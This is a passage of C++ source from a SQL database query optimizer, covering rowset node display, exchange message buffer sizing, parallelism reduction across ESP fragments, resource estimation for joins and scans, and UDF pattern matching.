(sizeExpr_) { if (sizeExpr_->getOperatorType() == ITM_CONSTANT) { char str[TEXT_DISPLAY_LENGTH]; sprintf(str, " " PF64, ((ConstValue *)sizeExpr_)->getExactNumericValue()); result += str; } else if (sizeExpr_->getOperatorType() == ITM_HOSTVAR) result += " " + ((HostVar *)sizeExpr_)->getName(); else result += " ??"; } result += " ("; for (ItemExpr *hostVarTree = inputHostvars_; hostVarTree != NULL; hostVarTree = hostVarTree->child(1)) { if (inputHostvars_ != hostVarTree) result += ", "; HostVar *hostVar = (HostVar *)hostVarTree->getChild(0); result += hostVar->getName(); } result += ")"; if (indexExpr_) result += ("KEY BY " + ((ColReference *)indexExpr_)->getColRefNameObj().getColName()); return result; } // returns the name of the exposed index of the Rowset const NAString Rowset::getIndexName() const { // A hack to check if the Rowset has an index expression NAString result("",CmpCommon::statementHeap()); if (indexExpr_) result += ((ColReference *)indexExpr_)->getColRefNameObj().getColName(); return(result); } // ----------------------------------------------------------------------- // methods for class Rowset // ----------------------------------------------------------------------- // Constructor RowsetRowwise::RowsetRowwise(RelExpr * childExpr, CollHeap* oHeap) : Rowset(NULL, NULL, NULL, childExpr, oHeap) { } // RowsetRowwise::RowsetRowwise() RelExpr * RowsetRowwise::copyTopNode(RelExpr *derivedNode, CollHeap* oHeap) { Rowset *result; if (derivedNode == NULL) result = new (oHeap) RowsetRowwise(NULL, oHeap); else { result = (RowsetRowwise *) derivedNode; } return Rowset::copyTopNode(result,oHeap); } // RowsetRowwise::copyTopNode() const NAString RowsetRowwise::getText() const { NAString result("RowSet Rowwise",CmpCommon::statementHeap()); return result; } Int32 RowsetRowwise::getArity() const { return 1; } // Rowset::getArity() RowsetFor::RowsetFor(RelExpr *child, ItemExpr *inputSizeExpr, ItemExpr *outputSizeExpr, ItemExpr *indexExpr, ItemExpr *maxSizeExpr, ItemExpr *maxInputRowlen, ItemExpr *rwrsBuffer, ItemExpr *partnNum, CollHeap *oHeap) : RelExpr(REL_ROWSETFOR,child,NULL,oHeap), inputSizeExpr_(inputSizeExpr), outputSizeExpr_(outputSizeExpr), indexExpr_(indexExpr), maxSizeExpr_(maxSizeExpr), maxInputRowlen_(maxInputRowlen), rwrsBuffer_(rwrsBuffer), partnNum_(partnNum), rowwiseRowset_(FALSE), packedFormat_(FALSE), compressed_(FALSE), dcompressInMaster_(FALSE), compressInMaster_(FALSE), partnNumInBuffer_(FALSE) { setNonCacheable(); } // Destructor. RowsetFor::~RowsetFor() { } RelExpr * RowsetFor::copyTopNode(RelExpr *derivedNode, CollHeap* oHeap) { RowsetFor *result; if (derivedNode == NULL) result = new (oHeap) RowsetFor(NULL, inputSizeExpr_, outputSizeExpr_, indexExpr_, maxSizeExpr_, maxInputRowlen_, rwrsBuffer_, partnNum_, oHeap); else result = (RowsetFor *) derivedNode; result->rowwiseRowset_ = rowwiseRowset_; result->setBufferAttributes(packedFormat_, compressed_, dcompressInMaster_, compressInMaster_, partnNumInBuffer_); return RelExpr::copyTopNode(result,oHeap); } Int32 RowsetFor::getArity() const { return 1; } // RowsetFor::getArity() const NAString RowsetFor::getText() const { NAString result("RowSetFor ", CmpCommon::statementHeap()); if (inputSizeExpr_) { if (inputSizeExpr_->getOperatorType() == ITM_CONSTANT) { char str[TEXT_DISPLAY_LENGTH]; sprintf(str, PF64, ((ConstValue *)inputSizeExpr_)->getExactNumericValue()); result += "INPUT SIZE "; result += str; } else if (inputSizeExpr_->getOperatorType() == ITM_HOSTVAR) result += "INPUT SIZE " + ((HostVar *)inputSizeExpr_)->getName(); else result += "INPUT SIZE ??"; if (outputSizeExpr_ || indexExpr_) result += ","; } if (outputSizeExpr_) { if (outputSizeExpr_->getOperatorType() == ITM_CONSTANT) { char str[TEXT_DISPLAY_LENGTH]; sprintf(str, PF64, ((ConstValue *)outputSizeExpr_)->getExactNumericValue()); result += "OUTPUT SIZE "; result += str; } else if (outputSizeExpr_->getOperatorType() == ITM_HOSTVAR) result += "OUTPUT SIZE " + ((HostVar *)outputSizeExpr_)->getName(); else result += "OUTPUT SIZE ??"; if (indexExpr_) result += ","; } if (indexExpr_) result += ("KEY BY " + ((ColReference *)indexExpr_)->getColRefNameObj().getColName()); return result; } // ----------------------------------------------------------------------- // methods for class RowsetInto // ----------------------------------------------------------------------- // Constructor RowsetInto::RowsetInto(RelExpr *child, ItemExpr *outputHostvars, ItemExpr *sizeExpr, CollHeap* oHeap) : RelExpr(REL_ROWSET_INTO,child,NULL,oHeap), outputHostvars_(outputHostvars), sizeExpr_(sizeExpr), requiredOrderTree_(NULL) { setNonCacheable(); requiredOrder_.clear(); } // RowsetInto::RowsetInto() // Destructor. RowsetInto::~RowsetInto() { } // RowsetInto::~RowsetInto() RelExpr * RowsetInto::copyTopNode(RelExpr *derivedNode, CollHeap* oHeap) { RowsetInto *result; if (derivedNode == NULL) result = new (oHeap) RowsetInto(NULL, outputHostvars_, sizeExpr_, oHeap); else result = (RowsetInto *) derivedNode; return RelExpr::copyTopNode(result,oHeap); } // RowsetInto::copyTopNode() Int32 RowsetInto::getArity() const { return 1; // This select-list root node } // RowsetInto::getArity() const NAString RowsetInto::getText() const { NAString result("RowsetINTO",CmpCommon::statementHeap()); if (sizeExpr_) { if (sizeExpr_->getOperatorType() == ITM_CONSTANT) { char str[TEXT_DISPLAY_LENGTH]; sprintf(str, " " PF64 , ((ConstValue *)sizeExpr_)->getExactNumericValue()); result += str; } else if (sizeExpr_->getOperatorType() == ITM_HOSTVAR) result += " " + ((HostVar *)sizeExpr_)->getName(); else result += " ??"; } result += " ("; for (ItemExpr *hostVarTree = outputHostvars_; hostVarTree != NULL; hostVarTree = hostVarTree->child(1)) { if (outputHostvars_ != hostVarTree) result += ", "; HostVar *hostVar = (HostVar *)hostVarTree->getChild(0); result += hostVar->getName(); } result += ")"; return result; } NABoolean RelExpr::treeContainsEspExchange() { Lng32 nc = getArity(); if (nc > 0) { if ((getOperatorType() == REL_EXCHANGE) && (child(0)->castToRelExpr()->getPhysicalProperty()->getPlanExecutionLocation() != EXECUTE_IN_DP2)) { return TRUE; } for (Lng32 i = 0; i < nc; i++) { if (child(i)->treeContainsEspExchange()) return TRUE; } } return FALSE; } NABoolean Exchange::areProbesHashed(const ValueIdSet pkey) { return getGroupAttr()->getCharacteristicInputs().contains(pkey); } void Exchange::computeBufferLength(const Context *myContext, const CostScalar &numConsumers, const CostScalar &numProducers, CostScalar &upMessageBufferLength, CostScalar &downMessageBufferLength) { CostScalar numDownBuffers = (Int32) ActiveSchemaDB()->getDefaults().getAsULong (GEN_SNDT_NUM_BUFFERS); CostScalar numUpBuffers = (Int32) ActiveSchemaDB()->getDefaults().getAsULong (GEN_SNDB_NUM_BUFFERS); CostScalar maxOutDegree = MAXOF(numConsumers, numProducers); CostScalar upSizeOverride = ActiveSchemaDB()->getDefaults().getAsLong (GEN_SNDT_BUFFER_SIZE_UP); // The adjustment is a fudge factor to improve scalability by // reducing the buffer size // "penalty" when the number of connections is high due //to a high degree of parallelism. // The net result is to increase the memory "floor" and "ceiling" // (that are base d on the // number of connections) by up to fourfold. //Too high a ceiling can cause memory pressure, // a high level of paging activity, etc., //while too low a ceiling can cause a large // number of IPC messages and dispatches, and a // resultant increase in path lengt h. // The adjustment attempts to strike a balance between // the two opposing clusters of performance factors. CostScalar adjMaxNumConnections = maxOutDegree < 32 || upSizeOverride == 1 || upSizeOverride > 2 ? maxOutDegree : maxOutDegree < 64 ? 32 : maxOutDegree < 128 ? 40 : maxOutDegree < 256 ? 50 : maxOutDegree < 512 ? 64 : 70; CostScalar overhead = CostScalar(50); // compute numProbes, probeSize, cardinality, outputSize CostScalar downRecordLength = getGroupAttr()-> getCharacteristicInputs().getRowLength(); CostScalar upRecordLength = getGroupAttr()-> getCharacteristicOutputs().getRowLength(); const CostScalar & numOfProbes = ( myContext->getInputLogProp()->getResultCardinality() ).minCsOne(); // use no more than 50 KB and try to send all rows down in a single message CostScalar reasonableBufferSpace1 = CostScalar(50000) / (maxOutDegree * numDownBuffers); reasonableBufferSpace1 = MINOF(reasonableBufferSpace1, (downRecordLength + overhead) * numOfProbes); const EstLogPropSharedPtr inputLP = myContext->getInputLogProp(); CostScalar numRowsUp = child(0).outputLogProp(inputLP)-> getResultCardinality(); const PartitioningFunction* const parentPartFunc = myContext->getPlan()->getPhysicalProperty()->getPartitioningFunction(); if (parentPartFunc->isAReplicateViaBroadcastPartitioningFunction()) numRowsUp = numRowsUp * numConsumers; // check for an overriding define for the buffer size CostScalar downSizeOverride = ActiveSchemaDB()->getDefaults().getAsLong (GEN_SNDT_BUFFER_SIZE_DOWN); if (downSizeOverride.isGreaterThanZero()) reasonableBufferSpace1 = downSizeOverride; // we MUST be able to fit at least one row into a buffer CostScalar controlAppendedLength= ComTdbSendTop::minSendBufferSize( (Lng32)downRecordLength.getValue()); downMessageBufferLength = MAXOF(controlAppendedLength, reasonableBufferSpace1); // Total size of output buffer that needs to be sent to the parent. CostScalar totalBufferSize = upRecordLength * numRowsUp; // Divide this by number of connections to get total buffer per connection. CostScalar bufferSizePerConnection = totalBufferSize / adjMaxNumConnections; // Aim for a situation where atleast 80 messages are sent per connection. CostScalar reasonableBufferSpace2 = bufferSizePerConnection / ActiveSchemaDB() ->getDefaults().getAsLong(GEN_EXCHANGE_MSG_COUNT); // Now Esp has numUpBuffers of size reasonableBufferSpace2 per // each stream (connection), so total memory to be allocated // in this Esp would be: // reasonableBufferSpace2 * numUpBuffers * maxOutDegree. // We need to apply ceiling and floor to this memory i.e.: // 4MB > reasonableBufferSpace2 * numUpBuffers * maxOutDegree > 50KB. // OR divide both ceiling and floor by numUpBuffers * maxOutDegree. Int32 maxMemKB = ActiveSchemaDB() ->getDefaults().getAsLong(GEN_EXCHANGE_MAX_MEM_IN_KB); if (maxMemKB <= 0) maxMemKB = 4000; // 4MB if not set or negative CostScalar maxMem1 = maxMemKB * 1000; CostScalar maxMem2 = maxMemKB * 4000; CostScalar ceiling = MINOF(maxMem1 / (numUpBuffers * adjMaxNumConnections), maxMem2 / (numUpBuffers * maxOutDegree)); CostScalar floor = MINOF(CostScalar(50000) / (numUpBuffers * adjMaxNumConnections), CostScalar(200000) / (numUpBuffers * maxOutDegree)); // Apply the floor. reasonableBufferSpace2 = MAXOF(floor, reasonableBufferSpace2); // Apply the ceiling. reasonableBufferSpace2 = MINOF(ceiling, reasonableBufferSpace2); // Make sure the floor is at least 5K to avoid performance problem. reasonableBufferSpace2 = MAXOF(CostScalar(5000), reasonableBufferSpace2); // Make sure that it is at most 31k-1356 reasonableBufferSpace2 = MINOF( reasonableBufferSpace2, 31 * 1024 - 1356); if (upSizeOverride.isGreaterThanZero()) reasonableBufferSpace2 = upSizeOverride; // we MUST be able to fit at least one row into a buffer controlAppendedLength = ComTdbSendTop::minReceiveBufferSize( (Lng32) (upRecordLength.getValue()) ); upMessageBufferLength = MAXOF( controlAppendedLength, reasonableBufferSpace2); // convert Buffers to kilo bytes upMessageBufferLength_= upMessageBufferLength = upMessageBufferLength/CostScalar(1024); downMessageBufferLength_ = downMessageBufferLength = downMessageBufferLength/ CostScalar(1024); } // Exchange::computeBufferLength() ////////////////////////////////////////////////////////////////////// // Class pcgEspFragment related methods ////////////////////////////////////////////////////////////////////// void pcgEspFragment::addChild(Exchange* esp) { CollIndex newIndex = childEsps_.entries(); childEsps_.insertAt(newIndex, esp); } // Verify that the newly added exchange node at the end of childEsps_[] // is compatible with others. // Note that preCodeGen traversal the query tree via a depth-first // search. Each time the leave exchange node in this fragment is encountered, // this method is called, The order of visit to the child exchanges // is from left to right. // NABoolean pcgEspFragment::tryToReduceDoP() { float threshold; ActiveSchemaDB()-> getDefaults().getFloat(DOP_REDUCTION_ROWCOUNT_THRESHOLD, threshold); if ( threshold == 0.0 || getTotaleRows() >= threshold ) { return FALSE; } // Defensive programming. Nothing to verify when there is no child esp. if ( childEsps_.entries() == 0 ) return FALSE; // Get the ptr to last exchange CollIndex lastIdx = childEsps_.entries()-1; Exchange* xch = childEsps_[lastIdx]; // // No dop reduction for Parallel Extract // if ( xch->getExtractProducerFlag() || xch->getExtractConsumerFlag() ) return FALSE; PartitioningFunction* partFunc = xch->getPhysicalProperty()->getPartitioningFunction(); // // If xch's count of partitions is less than newDoP, bail out // Lng32 newDoP = CURRSTMT_OPTDEFAULTS->getDefaultDegreeOfParallelism(); if ( partFunc->getCountOfPartitions() < newDoP ) return FALSE; // Do not reduce dop if this exchange is a PA, except if it is // the right child of a TYPE2 join, using replicate-no-broadcast. // An extra exchange is needed otherwise to bridge the // new DoP and all original partitions, unless the newDoP is a factor // of #part of the hash2 partfunc for the PA node. // if ( xch->child(0)->getPhysicalProperty() ->getPlanExecutionLocation() == EXECUTE_IN_DP2) { if ( partFunc->isAHash2PartitioningFunction() ) { if ( partFunc->getCountOfPartitions() % newDoP != 0 ) return FALSE; } else if (!partFunc->isAReplicateNoBroadcastPartitioningFunction()) return FALSE; } Lng32 suggestedNewDoP = newDoP; // // Make a copy of the part func as the scaling method can side effect. // PartitioningFunction* partFuncCopy = xch->getPhysicalProperty()->getPartitioningFunction()->copy(); PartitioningFunction* newPF = partFuncCopy->scaleNumberOfPartitions(suggestedNewDoP); // // If the part func can not scale to newDoP, bail out. // if ( suggestedNewDoP != newDoP ) return FALSE; // // Find a common dop for all child esps in the fragment first. // A common dop is one associated with 1st esp that has non- // broadcasting part func. All other child esps with non-broadcasting // partFunc should be use the "common dop". This is true prior to // the dop reduction attempt. If it is already found (commonDoP_ > 0), // just use it. // if ( commonDoP_ == 0 && partFuncCopy->isAReplicationPartitioningFunction() == FALSE ) commonDoP_ = partFuncCopy->getCountOfPartitions(); // If the dop at child exchange A can be reduced but not at // child exchange B, we may end up with in an inconsistent state. // The following code detects it. if ( commonDoP_ > 0 ) { if ( partFuncCopy->isAReplicationPartitioningFunction() == FALSE && partFuncCopy->getCountOfPartitions() != commonDoP_ ) return FALSE; } // // The new dop is acceptable. // newDoP_ = newDoP; setValid(TRUE); return TRUE; } void pcgEspFragment::invalidate() { setValid(FALSE); //for ( CollIndex i=0; i<childEsps_.entries(); i++ ) { // childEsps_[i]->getEspFragPCG()->invalidate(); //} } void pcgEspFragment::adjustDoP(Lng32 newDop) { for ( CollIndex i=0; i<childEsps_.entries(); i++ ) { Exchange* xch = childEsps_[i]; // Recursively adjust the dop for my child fragments. // Each exchange will have its own pcgEspFragment to work with. xch->doDopReduction(); } } void RelExpr::doDopReduction() { Int32 nc = getArity(); for (Lng32 i = 0; i < nc; i++) { child(i)->doDopReduction(); } } void Exchange::doDopReduction() { // // Once this method is called for the top most Exchange, we can // recursively call the same method for all the esp fragments via // the pointers (to esps) saved in the pcgEsgFragment objects. // Lng32 newDop = getEspFragPCG()->getNewDop(); if ( getEspFragPCG()->isValid() ) { // Adjust the partfunc for all nodes within the fragment, starting // from my child and down to every bottom-defining exchanges. child(0)->doDopReductionWithinFragment(newDop); } // Next recursively call the same method for all fragments below me. getEspFragPCG()->adjustDoP(newDop); } void RelExpr::doDopReductionWithinFragment(Lng32 newDoP) { adjustTopPartFunc(newDoP); if ( getOperatorType() == REL_EXCHANGE ) { // // Need to adjust the Logical part of the part func if // my child's part func is a LogPhy partfunc. // if ( child(0)->getPhysicalProperty()->getPlanExecutionLocation() == EXECUTE_IN_DP2) { PartitioningFunction *pf = child(0)->getPhysicalProperty()->getPartitioningFunction(); if ( pf->isALogPhysPartitioningFunction() ) child(0)->adjustTopPartFunc(newDoP); } return; } Int32 nc = getArity(); for (Lng32 i = 0; i < nc; i++) { child(i)->doDopReductionWithinFragment(newDoP); } } void RelExpr::adjustTopPartFunc(Lng32 newDop) { ((PhysicalProperty*)getPhysicalProperty())->scaleNumberOfPartitions(newDop); setDopReduced(TRUE); } // Required Resource Estimate Methods - Begin void RelExpr::computeRequiredResources(RequiredResources & reqResources, EstLogPropSharedPtr & inLP) { Int32 nc = getArity(); for (Lng32 i = 0; i < nc; i++) { if (child(i)) child(i)->computeRequiredResources(reqResources, inLP); else child(i).getLogExpr()->computeRequiredResources(reqResources, inLP); } computeMyRequiredResources(reqResources, inLP); } void Join::computeRequiredResources(RequiredResources & reqResources, EstLogPropSharedPtr & inLP) { Int32 nc = getArity(); if (child(0)) child(0)->computeRequiredResources(reqResources, inLP); else child(0).getLogExpr()->computeRequiredResources(reqResources, inLP); EstLogPropSharedPtr inputForRight = inLP; EstLogPropSharedPtr leftOutput = child(0).getGroupAttr()->outputLogProp(inLP); if(isTSJ()) { inputForRight = leftOutput; } if (child(1)) child(1)->computeRequiredResources(reqResources, inputForRight); else child(1).getLogExpr()->computeRequiredResources(reqResources, inputForRight); computeMyRequiredResources(reqResources, inLP); } void RequiredResources::accumulate(CostScalar memRsrcs, CostScalar cpuRsrcs, CostScalar dataAccessCost, CostScalar maxCard) { memoryResources_ += memRsrcs; cpuResources_ += cpuRsrcs; dataAccessCost_ += dataAccessCost; if(maxOperMemReq_ < memRsrcs) maxOperMemReq_ = memRsrcs; if(maxOperCPUReq_ < cpuRsrcs) maxOperCPUReq_ = cpuRsrcs; if(maxOperDataAccessCost_ < dataAccessCost) maxOperDataAccessCost_ = dataAccessCost; if(maxMaxCardinality_ < maxCard) maxMaxCardinality_ = maxCard; } void RelExpr::computeMyRequiredResources(RequiredResources & reqResources, EstLogPropSharedPtr & inLP) { CostScalar cpuResourcesRequired = csZero; CostScalar A = csOne; CostScalar B (getDefaultAsDouble(WORK_UNIT_ESP_DATA_COPY_COST)); Int32 nc = getArity(); for (Lng32 i = 0; i < nc; i++) { GroupAttributes * childGroupAttr = child(i).getGroupAttr(); CostScalar childCardinality = childGroupAttr->outputLogProp(inLP)->getResultCardinality(); CostScalar childRecordSize = childGroupAttr->getCharacteristicOutputs().getRowLength(); cpuResourcesRequired += (A * childCardinality) + (B * childCardinality * childRecordSize ); } CostScalar myMaxCard = getGroupAttr()->getResultMaxCardinalityForInput(inLP); reqResources.accumulate(csZero, cpuResourcesRequired, csZero, myMaxCard); } void RelRoot::computeMyRequiredResources(RequiredResources & reqResources, EstLogPropSharedPtr & inLP) { if (hasOrderBy()) { CostScalar memoryResourcesRequired = csZero; GroupAttributes * childGroupAttr = child(0).getGroupAttr(); CostScalar childCardinality = childGroupAttr->outputLogProp(inLP)->getResultCardinality(); CostScalar childRecordSize = childGroupAttr->getCharacteristicOutputs().getRowLength(); memoryResourcesRequired = (childCardinality * childRecordSize); reqResources.accumulate(memoryResourcesRequired, csZero, csZero); } // add the cpu resources RelExpr::computeMyRequiredResources(reqResources, inLP); } void MultiJoin::computeMyRequiredResources(RequiredResources & reqResources, EstLogPropSharedPtr & inLP) { // get the subset analysis for this MultiJoin JBBSubsetAnalysis * subsetAnalysis = getJBBSubset().getJBBSubsetAnalysis(); subsetAnalysis->computeRequiredResources(this,reqResources, inLP); } void Join::computeMyRequiredResources(RequiredResources & reqResources, EstLogPropSharedPtr & inLP) { CostScalar memoryResourcesRequired = csZero; // only get the max card for this join. The contribution from the children // of this join is done inside Join::computeReequiredResource() where // child(i)->computeRequiredResources() is called (i=0,1). These two calls // will call ::computeMyRequiredResoruce() of the corresponding RelExpr. // GroupAttributes * myGroupAttr = getGroupAttr(); CostScalar myMaxCard = myGroupAttr->getResultMaxCardinalityForInput(inLP); reqResources.accumulate(csZero, csZero, csZero, myMaxCard); if(!isTSJ()) { GroupAttributes * innerChildGroupAttr = child(1).getGroupAttr(); CostScalar innerChildCardinality = innerChildGroupAttr->outputLogProp(inLP)->getResultCardinality(); CostScalar innerChildRecordSize = innerChildGroupAttr->getCharacteristicOutputs().getRowLength(); memoryResourcesRequired = (innerChildCardinality * innerChildRecordSize); reqResources.accumulate(memoryResourcesRequired, csZero, csZero); // add the cpu resources RelExpr::computeMyRequiredResources(reqResources, inLP); } else{ // isTSJ() == TRUE CostScalar cpuResourcesRequired = csZero; CostScalar A = csOne; CostScalar B (getDefaultAsDouble(WORK_UNIT_ESP_DATA_COPY_COST)); Int32 nc = getArity(); EstLogPropSharedPtr inputForChild = inLP; for (Lng32 i = 0; i < nc; i++) { GroupAttributes * childGroupAttr = child(i).getGroupAttr(); CostScalar childCardinality = childGroupAttr->outputLogProp(inputForChild)->getResultCardinality(); CostScalar childRecordSize = childGroupAttr->getCharacteristicOutputs().getRowLength(); cpuResourcesRequired += (B * childCardinality * childRecordSize ); // do this only for the left child if(i < 1) cpuResourcesRequired += (A * childCardinality); inputForChild = child(i).getGroupAttr()->outputLogProp(inputForChild); } reqResources.accumulate(csZero, cpuResourcesRequired, csZero); } } void GroupByAgg::computeMyRequiredResources(RequiredResources & reqResources, EstLogPropSharedPtr & inLP) { CostScalar memoryResourcesRequired = csZero; GroupAttributes * childGroupAttr = child(0).getGroupAttr(); CostScalar childCardinality = childGroupAttr->outputLogProp(inLP)->getResultCardinality(); CostScalar childRecordSize = childGroupAttr->getCharacteristicOutputs().getRowLength(); memoryResourcesRequired = (childCardinality * childRecordSize); reqResources.accumulate(memoryResourcesRequired, csZero, csZero); // add the cpu resources RelExpr::computeMyRequiredResources(reqResources, inLP); } void Scan::computeMyRequiredResources(RequiredResources & reqResources, EstLogPropSharedPtr & inLP) { if(!(QueryAnalysis::Instance() && QueryAnalysis::Instance()->isAnalysisON())) return; //Get a handle to ASM AppliedStatMan * appStatMan = QueryAnalysis::ASM(); const TableAnalysis * tAnalysis = getTableDesc()->getTableAnalysis(); CANodeId tableId = tAnalysis->getNodeAnalysis()->getId(); // Find index joins and index-only scans addIndexInfo(); // Base table scan is one of the index only scans. CostScalar cpuCostIndexOnlyScan = computeCpuResourceForIndexOnlyScans(tableId); CostScalar cpuCostIndexJoinScan = computeCpuResourceForIndexJoinScans(tableId); CostScalar cpuResourcesRequired = cpuCostIndexOnlyScan; if ( getTableDesc()->getNATable()->isHbaseTable()) { if ( cpuCostIndexJoinScan < cpuResourcesRequired ) cpuResourcesRequired = cpuCostIndexJoinScan; } CostScalar dataAccessCost = tAnalysis->getFactTableNJAccessCost(); if(dataAccessCost < 0) { CostScalar rowsToScan = appStatMan-> getStatsForLocalPredsOnCKPOfJBBC(tableId)-> getResultCardinality(); CostScalar numOfProbes(csZero); // skip this for fact table under nested join dataAccessCost = tAnalysis->computeDataAccessCostForTable(numOfProbes, rowsToScan); } CostScalar myMaxCard = getGroupAttr()->getResultMaxCardinalityForInput(inLP); reqResources.accumulate(csZero, cpuResourcesRequired, dataAccessCost, myMaxCard ); } // Required Resource Estimate Methods - End CostScalar Scan::computeCpuResourceRequired(const CostScalar& rowsToScan, const CostScalar& rowSize) { CostScalar A = csOne; CostScalar B (getDefaultAsDouble(WORK_UNIT_ESP_DATA_COPY_COST)); CostScalar cpuResourcesRequired = (B * rowsToScan * rowSize); cpuResourcesRequired += (A * rowsToScan); return cpuResourcesRequired; } CostScalar Scan::computeCpuResourceForIndexOnlyScans(CANodeId tableId) { // If index only scans are available, find the most // promising index and compute the CPU resource for it. const SET(IndexProperty *)& indexOnlyScans = getIndexOnlyIndexes(); IndexProperty* smallestIndex = findSmallestIndex(indexOnlyScans); if ( !smallestIndex ) return COSTSCALAR_MAX; IndexDesc* iDesc = smallestIndex->getIndexDesc(); const ValueIdList &ikeys = iDesc->getIndexKey(); AppliedStatMan * appStatMan = QueryAnalysis::ASM(); EstLogPropSharedPtr estLpropPtr = appStatMan-> getStatsForLocalPredsOnPrefixOfColList(tableId, ikeys); if ( !(estLpropPtr.get()) ) return COSTSCALAR_MAX; return computeCpuResourceRequired(estLpropPtr->getResultCardinality(), iDesc->getRecordLength() ); } CostScalar Scan::computeCpuResourceForIndexJoinScans(CANodeId tableId) { // If index scans are available, find the index with most promising and // compute the CPU resource for it. const LIST(ScanIndexInfo *)& scanIndexJoins = getPossibleIndexJoins(); if ( scanIndexJoins.entries() == 0 ) return COSTSCALAR_MAX; IndexProperty* smallestIndex = findSmallestIndex(scanIndexJoins); IndexDesc* iDesc = smallestIndex->getIndexDesc(); CostScalar rowsToScan; return computeCpuResourceForIndexJoin(tableId, iDesc, iDesc->getIndexKey(), rowsToScan); } CostScalar Scan::computeCpuResourceForIndexJoin(CANodeId tableId, IndexDesc* iDesc, ValueIdSet& indexPredicates, CostScalar& rowsToScan) { ValueIdList ikeysCovered; UInt32 sz = iDesc->getIndexKey().entries(); for (CollIndex i=0; i<sz; i++) { ValueId x = iDesc->getIndexKey()[i]; if ( indexPredicates.containsAsEquiLocalPred(x) ) ikeysCovered.insertAt(i, x); else break; } return computeCpuResourceForIndexJoin(tableId, iDesc, ikeysCovered, rowsToScan); } CostScalar Scan::computeCpuResourceForIndexJoin(CANodeId tableId, IndexDesc* iDesc, const ValueIdList& ikeys, CostScalar& rowsToScan) { AppliedStatMan * appStatMan = QueryAnalysis::ASM(); EstLogPropSharedPtr estLpropPtr = appStatMan-> getStatsForLocalPredsOnPrefixOfColList(tableId, ikeys); if ( !(estLpropPtr.get()) ) { rowsToScan = COSTSCALAR_MAX; return COSTSCALAR_MAX; } rowsToScan = estLpropPtr->getResultCardinality(); CostScalar rowSize = iDesc->getRecordLength(); CostScalar cpuResourceForIndex = computeCpuResourceRequired(rowsToScan, rowSize); rowSize = getTableDesc()->getClusteringIndex()->getRecordLength(); CostScalar cpuResourceForBaseTable = computeCpuResourceRequired(rowsToScan, rowSize); return cpuResourceForIndex + cpuResourceForBaseTable; } IndexProperty* Scan::findSmallestIndex(const SET(IndexProperty *)& indexes) const { CollIndex entries = indexes.entries(); if ( entries == 0 ) return NULL; IndexProperty* smallestIndex = indexes[0]; for (CollIndex i=1; i<entries; i++ ) { IndexProperty* current = indexes[i]; if ( smallestIndex->compareIndexPromise(current) == LESS ) { smallestIndex = current; } } return smallestIndex; } IndexProperty* Scan::findSmallestIndex(const LIST(ScanIndexInfo *)& possibleIndexJoins) const { CollIndex entries = possibleIndexJoins_.entries(); if ( entries == 0 ) return NULL; IndexProperty* smallestIndex = findSmallestIndex(possibleIndexJoins[0]->usableIndexes_); for (CollIndex i=1; i<entries; i++ ) { IndexProperty* current = findSmallestIndex(possibleIndexJoins[i]->usableIndexes_); if ( smallestIndex->compareIndexPromise(current) == LESS ) { smallestIndex = current; } } return smallestIndex; } // This function checks if the passed RelExpr is a UDF rule created by a CQS // (REL_FORCE_ANY_SCALAR_UDF). If not, then RelExpr::patternMatch() is called. // If the CQS rule includes the UDF name this name is checked against the routine // name of this physical isolated scalar UDF. If the CQS rule includes the action // name, then this is checked against the action name of this physical isolated // scalar UDF as well. The function returns TRUE if so, otherwise FALSE. NABoolean PhysicalIsolatedScalarUDF::patternMatch(const RelExpr & other) const { // Check if CQS is a scalar UDF rule. if (other.getOperatorType() == REL_FORCE_ANY_SCALAR_UDF) { UDFForceWildCard &w = (UDFForceWildCard &) other; // Check function name, if specified in UDFForceWildCard. if (w.getFunctionName() != "") { QualifiedName funcName(w.getFunctionName(), 1 /* minimal 1 part name */); // Compare catalog, schema and udf parts separately, // if they exist in the wildcard const NAString& catName = funcName.getCatalogName(); const NAString& schName = funcName.getSchemaName(); const QualifiedName& x = getRoutineName(); if ((catName.length() > 0 && x.getCatalogName() != catName) || (schName.length() > 0 && x.getSchemaName() != schName) || x.getObjectName() != funcName.getObjectName()) return FALSE; } // Check action name, if specified in UDFForceWildCard. if (w.getActionName() != "") { NAString actionName = w.getActionName(); if (getActionNARoutine() && getActionNARoutine()->getActionName()) { // Compare only object parts. Right now actions don't support catalogs and schemas. // This is because action names can have a leading '$' as part of name. const NAString& x = *(getActionNARoutine()->getActionName()); if (x != actionName) return FALSE; } else return FALSE; } return TRUE; } else return RelExpr::patternMatch(other); } const NAString RelExpr::getCascadesTraceInfoStr() { NAString result("RelExpr Cascades Trace Info:\n"); result += " parent taskid: " + istring(getParentTaskId()) + "\n"; result += " sub taskid: " + istring(getSubTaskId()) + "\n"; result += " birth id: " + istring(getBirthId()) + "\n"; result += " memo exprid: " + istring(memoExprId_) + "\n"; result += " source memo exprid: " + istring(sourceMemoExprId_) + "\n"; result += " source groupid: " + istring(sourceGroupId_) + "\n"; char costLimitStr[50]; sprintf(costLimitStr," cost limit %g\n", costLimit_); result += costLimitStr; return result; } // remember the creator and source of this relexpr for cascades display gui void RelExpr::setCascadesTraceInfo(RelExpr *src) { CascadesTask * currentTask = CURRSTMT_OPTDEFAULTS->getCurrentTask(); if (currentTask) { // current task created this relexpr parentTaskId_ = currentTask->getParentTaskId(); stride_ = currentTask->getSubTaskId(); // remember time of my birth birthId_ = CURRSTMT_OPTDEFAULTS->getTaskCount(); // remember my source sourceGroupId_ = currentTask->getGroupId(); if (src) sourceMemoExprId_ = src->memoExprId_; // remember current task's context's CostLimit Context * context = currentTask->getContext(); if(context && context->getCostLimit()) costLimit_ = context->getCostLimit()->getCachedValue(); } // get my MemoExprId and advance it memoExprId_ = CURRSTMT_OPTDEFAULTS->updateGetMemoExprCount(); } NABoolean Join::childNodeContainSkew( CollIndex i, // IN: which child const ValueIdSet& joinPreds, // IN: the join predicate double threshold, // IN: the threshold SkewedValueList** skList // OUT: the skew list ) const { // Can not deal with multicolumn skew in this method. if ( joinPreds.entries() != 1 ) return FALSE; NABoolean statsExist; // a place holder Int32 skews = 0; for(ValueId vid = joinPreds.init(); joinPreds.next(vid); joinPreds.advance(vid)) { *skList = child(i).getGroupAttr()-> getSkewedValues(vid, threshold, statsExist, (*GLOBAL_EMPTY_INPUT_LOGPROP), isLeftJoin()/* include skewed NULLs only for left outer join */ ); if (*skList == NULL || (*skList)->entries() == 0) break; else skews++; } return ( skews == joinPreds.entries() ); } // // Check if some join column is of a SQL type whose run-time // implementation has a limitation for SB to work. // // return // TRUE: no limitation // FALSE: has limitation and SB should not be applied // NABoolean Join::singleColumnjoinPredOKforSB(ValueIdSet& joinPreds) { ValueId 